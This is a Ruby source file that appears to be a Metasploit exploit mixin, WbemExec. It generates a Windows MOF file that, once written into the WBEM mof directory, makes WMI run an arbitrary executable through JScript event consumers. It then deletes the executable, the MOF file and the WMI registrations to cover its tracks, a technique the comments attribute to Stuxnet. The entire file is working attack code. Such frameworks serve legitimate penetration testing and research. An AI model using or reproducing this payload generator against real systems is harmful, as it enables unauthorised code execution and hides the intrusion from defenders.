100 lines
2.9 KiB
Ruby
100 lines
2.9 KiB
Ruby
# -*- coding: binary -*-
|
|
|
|
#
|
|
# This mixin enables executing arbitrary commands via the
|
|
# Windows Management Instrumentation service.
|
|
#
|
|
# By writing the output of these methods to %SystemRoot%\system32\WBEM\mof,
|
|
# your command line will be executed.
|
|
#
|
|
# This technique was used as part of Stuxnet and further reverse engineered
|
|
# to this form by Ivanlef0u and jduck.
|
|
#
|
|
|
|
module Msf
|
|
module Exploit::WbemExec
|
|
|
|
def generate_mof(mofname, exe)
|
|
|
|
classname = rand(0xffff).to_s
|
|
|
|
# From Ivan's decompressed version
|
|
mof = <<-EOT
|
|
#pragma namespace("\\\\\\\\.\\\\root\\\\cimv2")
|
|
class MyClass@CLASS@
|
|
{
|
|
[key] string Name;
|
|
};
|
|
class ActiveScriptEventConsumer : __EventConsumer
|
|
{
|
|
[key] string Name;
|
|
[not_null] string ScriptingEngine;
|
|
string ScriptFileName;
|
|
[template] string ScriptText;
|
|
uint32 KillTimeout;
|
|
};
|
|
instance of __Win32Provider as $P
|
|
{
|
|
Name = "ActiveScriptEventConsumer";
|
|
CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
|
|
PerUserInitialization = TRUE;
|
|
};
|
|
instance of __EventConsumerProviderRegistration
|
|
{
|
|
Provider = $P;
|
|
ConsumerClassNames = {"ActiveScriptEventConsumer"};
|
|
};
|
|
Instance of ActiveScriptEventConsumer as $cons
|
|
{
|
|
Name = "ASEC";
|
|
ScriptingEngine = "JScript";
|
|
ScriptText = "\\ntry {var s = new ActiveXObject(\\"Wscript.Shell\\");\\ns.Run(\\"@EXE@\\");} catch (err) {};\\nsv = GetObject(\\"winmgmts:root\\\\\\\\cimv2\\");try {sv.Delete(\\"MyClass@CLASS@\\");} catch (err) {};try {sv.Delete(\\"__EventFilter.Name='instfilt'\\");} catch (err) {};try {sv.Delete(\\"ActiveScriptEventConsumer.Name='ASEC'\\");} catch(err) {};";
|
|
|
|
};
|
|
Instance of ActiveScriptEventConsumer as $cons2
|
|
{
|
|
Name = "qndASEC";
|
|
ScriptingEngine = "JScript";
|
|
ScriptText = "\\nvar objfs = new ActiveXObject(\\"Scripting.FileSystemObject\\");\\ntry {var f1 = objfs.GetFile(\\"wbem\\\\\\\\mof\\\\\\\\good\\\\\\\\#{mofname}\\");\\nf1.Delete(true);} catch(err) {};\\ntry {\\nvar f2 = objfs.GetFile(\\"@EXE@\\");\\nf2.Delete(true);\\nvar s = GetObject(\\"winmgmts:root\\\\\\\\cimv2\\");s.Delete(\\"__EventFilter.Name='qndfilt'\\");s.Delete(\\"ActiveScriptEventConsumer.Name='qndASEC'\\");\\n} catch(err) {};";
|
|
};
|
|
instance of __EventFilter as $Filt
|
|
{
|
|
Name = "instfilt";
|
|
Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \\"MyClass@CLASS@\\"";
|
|
QueryLanguage = "WQL";
|
|
};
|
|
instance of __EventFilter as $Filt2
|
|
{
|
|
Name = "qndfilt";
|
|
Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \\"Win32_Process\\" AND TargetInstance.Name = \\"@EXE@\\"";
|
|
QueryLanguage = "WQL";
|
|
|
|
};
|
|
instance of __FilterToConsumerBinding as $bind
|
|
{
|
|
Consumer = $cons;
|
|
Filter = $Filt;
|
|
};
|
|
instance of __FilterToConsumerBinding as $bind2
|
|
{
|
|
Consumer = $cons2;
|
|
Filter = $Filt2;
|
|
};
|
|
instance of MyClass@CLASS@ as $MyClass
|
|
{
|
|
Name = "ClassConsumer";
|
|
};
|
|
EOT
|
|
|
|
# Replace the input vars
|
|
mof.gsub!(/@CLASS@/, classname)
|
|
mof.gsub!(/@EXE@/, exe) # NOTE: \ and " should be escaped
|
|
|
|
mof
|
|
end
|
|
|
|
end
|
|
end
|
|
|
|
|